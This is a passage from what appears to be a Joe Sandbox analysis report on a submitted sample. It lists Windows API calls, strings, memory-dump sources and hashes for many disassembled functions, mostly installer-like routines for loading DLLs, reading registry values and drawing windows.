                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$LoadSleep
                                                                                                            • String ID: CheckPassword
                                                                                                            • API String ID: 4023313301-1302249611
                                                                                                            • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                                            • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                                                            • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                                            • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                                                            APIs
                                                                                                              • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                                              • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                                              • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                                                            • GetTickCount.KERNEL32 ref: 0047678E
                                                                                                            • GetTickCount.KERNEL32 ref: 00476798
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                                                            Strings
                                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                            • API String ID: 613034392-3771334282
                                                                                                            • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                                            • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                                                            • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                                            • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                                                            Strings
                                                                                                            • Fusion.dll, xrefs: 00458EFF
                                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                                                            • CreateAssemblyCache, xrefs: 00458F56
                                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                            • API String ID: 190572456-3990135632
                                                                                                            • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                                            • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                                                            • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                                            • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                                            • GetFocus.USER32 ref: 0041C178
                                                                                                            • 73A1A570.USER32(?), ref: 0041C184
                                                                                                            • 73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                                            • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                                            • 73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                                            • 73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A18830$A122A480A570BitsFocusObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 2231653193-0
                                                                                                            • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                                            • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                                            • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                                            • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                                            • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                                              • Part of subcall function 004099C0: 6F52C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                                            • 6F59CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                                            • 6F59C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                                            • 6F59CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                                            • 6F530860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$C400C740F530860F532980
                                                                                                            • String ID:
                                                                                                            • API String ID: 209721339-0
                                                                                                            • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                                            • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                                                            • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                                            • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                            • API String ID: 47109696-2530820420
                                                                                                            • Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                                                            • Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
                                                                                                            • Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                                                            • Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                                                            APIs
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                                            • String ID:
                                                                                                            • API String ID: 1458357782-0
                                                                                                            • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                            • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                                            • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                            • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
                                                                                                            • 73A1A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                                                            Strings
                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                            • API String ID: 1435929781-222967699
                                                                                                            • Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                                                            • Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
                                                                                                            • Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                                                            • Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32 ref: 004233BF
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                                            • SetCursor.USER32(00000000), ref: 00423423
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1770779139-0
                                                                                                            • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                            • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                                            • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                            • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                            • String ID: H=w$l3w
                                                                                                            • API String ID: 730355536-1292453710
                                                                                                            • Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                                            • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                                                            • Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                                            • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                            • API String ID: 667068680-2254406584
                                                                                                            • Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                                                            • Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
                                                                                                            • Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                                                            • Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
                                                                                                            APIs
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                                                            • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
                                                                                                            • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                            • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                            • API String ID: 2573145106-911929905
                                                                                                            • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                                            • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                                                            • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                                            • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(02390000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                                                            • GetProcAddress.KERNEL32(02390000,BZ2_bzDecompress), ref: 0045CDC1
                                                                                                            • GetProcAddress.KERNEL32(02390000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                            • API String ID: 190572456-212574377
                                                                                                            • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                                            • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                                                            • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                                            • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                                                            • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                                              • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                                              • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                                              • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
